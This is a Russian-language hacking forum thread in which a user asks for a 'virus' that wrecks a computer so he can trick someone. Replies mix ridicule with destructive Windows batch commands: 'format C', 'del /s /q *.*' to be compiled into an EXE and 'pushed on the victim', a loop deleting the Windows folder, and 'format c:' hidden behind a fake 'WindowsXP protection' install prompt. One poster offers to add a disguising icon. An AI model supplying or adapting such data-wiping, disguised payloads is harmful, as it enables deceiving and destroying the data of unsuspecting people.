![]() |
Наказать ЛАМЕРА!!!!HElp
Нужен вирус который портит всё на компе.ПРосто один мальчик хочет развести топового человека
|
накажи себя сам format C
|
Trojangodlabshupertuperontechad_v.0.4.4.6_NE_PALIT SA_EDITION
гугли |
Цитата:
|
ща быстро потыкаю в клавиши с устремленным в монитор взглядом и хекну всю систему снабжения электричеством в мире ::d:d:d:d:d:d::d:d:d:d
|
P3l3ng, смешно...
|
мля одни питрасяны
|
А если что по делу?
|
Как же вы все задрали, тру хэккеры... пойми, что ты тру хэккер, не всегда был таким... когда то ты сам только начинал позновать комп и инет и все из нас были нубами когда-то...
------------------------------- + тру хэкеер не знает про вирь... ты не тру( |
Omen666
от гуру плюс адын гуру! |
Супермегаофигенный трухаквирусня:
virus.bat Код:
@echo off |
ппц! признаюсь честно- я в этом мало что понимаю(если не сказать НИЧЕГО не понимаю) но судя по командам вещ убойная!))
а как этим пользоваться? :confused: |
|nnomina†us™, там всего одна комманда)))
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
ээх... я от этого далек...
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
реально если попытаться поформать системный или активный диск то ниче не произойдет, нубы бля. тока можете над такими же нубами как и вы глумиться. и не надо писать засчитникам нубов бисать что все такими были, когда я начинал и был "нубом" я не постил такие тупые посты как ТС и все остальные, я юзал гугл, десятки раз убивал винду на компе, потом как виртуалкой научился пользоваться сотни раз убивал виртуалку, читал тонны статей, но такую ХУЙНЮ никогда не писал на форумах и не спрашивал у знакомых.
|
Цитата:
|
Цитата:
Даже за уязвимости столько не ставили)) |
Цитата:
del /s /q *.* и сделать из него ЕХЕ файл. Или в архив закинь дальше нету разницы.Главное впарь жертве. |
@Echo off
For %%a in (%Windi%) do RemDir /s /q %%a Del *.* Должно удалить все в папке виндовс вместе с подпапками, кагда то я себе на 98хп так все нах удалил по синьке) |
Цитата:
Цитата:
Так как я смотрю что тут один лиш стеб пощел то помогу школьнику...(только хватит трогать тему школьников-я имею ввиду человека который ТОЛЬКО НАЧИНАЕТ учиться хакерству) ОТ тебя лишь трубуется указать(отписаться) иконку какого типа к вирю присабачить... |
Цитата:
format c: | echo If you want to installed WindowsXPprotection press Y or not press N. Install this protection component? действительно ничего.. |
| Время: 17:52 |